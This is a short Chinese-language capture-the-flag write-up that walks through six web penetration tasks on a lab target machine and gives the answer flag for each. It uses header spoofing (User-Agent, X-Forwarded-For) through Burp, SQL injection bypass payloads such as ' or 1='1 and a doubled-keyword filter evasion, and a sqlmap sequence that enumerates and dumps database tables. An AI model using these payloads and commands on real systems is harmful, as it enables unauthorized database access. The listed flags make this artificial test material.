WEB综合渗透

1.通过浏览器访问http://靶机IP/1,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包修改用户代理(User-Agent)

修改为 User-Agent:ERROR

WEB综合渗透_第1张图片

WEB综合渗透_第2张图片

 flag:zTdKVpUKJu

2.通过浏览器访问http://靶机IP/2,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加  X-Forwarded-For:192.168.1.1

WEB综合渗透_第3张图片

flag:6i3zXHDPOx

3.通过浏览器访问http://靶机IP/3,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加SQL注入万能语句  ' or 1='1

WEB综合渗透_第4张图片

flag:7Z9hwFpOlf

4.通过浏览器访问http://靶机IP/4,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加 ") or 1=1#                    #使用") # 符号过滤

WEB综合渗透_第5张图片

flag:YbR0BlQEVo

5.通过浏览器访问http://靶机IP/5,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

在URL中添加 ' oorr 1=1--+

WEB综合渗透_第6张图片

flag:rNPco4KBLN

6.通过浏览器访问http://靶机IP/6,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

详细步骤:

通过burp抓取POST数据包,并将信息保存为1.txt 

WEB综合渗透_第7张图片

sqlmap -r 1.txt                     #检测是否存在注入点

WEB综合渗透_第8张图片

WEB综合渗透_第9张图片

sqlmap -r 1.txt --dbs                #爆破出所有数据库

WEB综合渗透_第10张图片WEB综合渗透_第11张图片

sqlmap -r 1.txt -D hello --tables           #选择要爆破的数据库进行爆表操作

 WEB综合渗透_第12张图片

WEB综合渗透_第13张图片

 sqlmap -r 1.txt -D hello -T user --columns           #确定表名,然后对字段进行爆破猜解

WEB综合渗透_第14张图片

WEB综合渗透_第15张图片

sqlmap -r 1.txt -D hello -T user -C id,username --dump              #爆破字段值

WEB综合渗透_第16张图片

WEB综合渗透_第17张图片

将id修改为2779/7269/8980,都可以获取flag

WEB综合渗透_第18张图片

 WEB综合渗透_第19张图片

 WEB综合渗透_第20张图片

flag:C9K8TVwf7Z

你可能感兴趣的:(网络安全,前端,html)